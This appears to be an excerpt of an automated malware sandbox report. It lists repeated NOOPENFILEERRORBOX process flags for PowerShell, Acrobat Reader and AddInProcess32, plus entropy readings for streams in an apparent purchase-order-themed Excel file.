Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Stream path 'MBD00438512/Package' entropy: 7.9962148377 (max. 8.0)
Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Stream path 'Workbook' entropy: 7.99871137469 (max. 8.0)
Source: ~DFC601DD9C0FBA6613.TMP.0.dr	Stream path 'Package' entropy: 7.99440464484 (max. 8.0)
Source: 62A30000.0.dr	Stream path 'MBD00438512/Package' entropy: 7.99440464484 (max. 8.0)
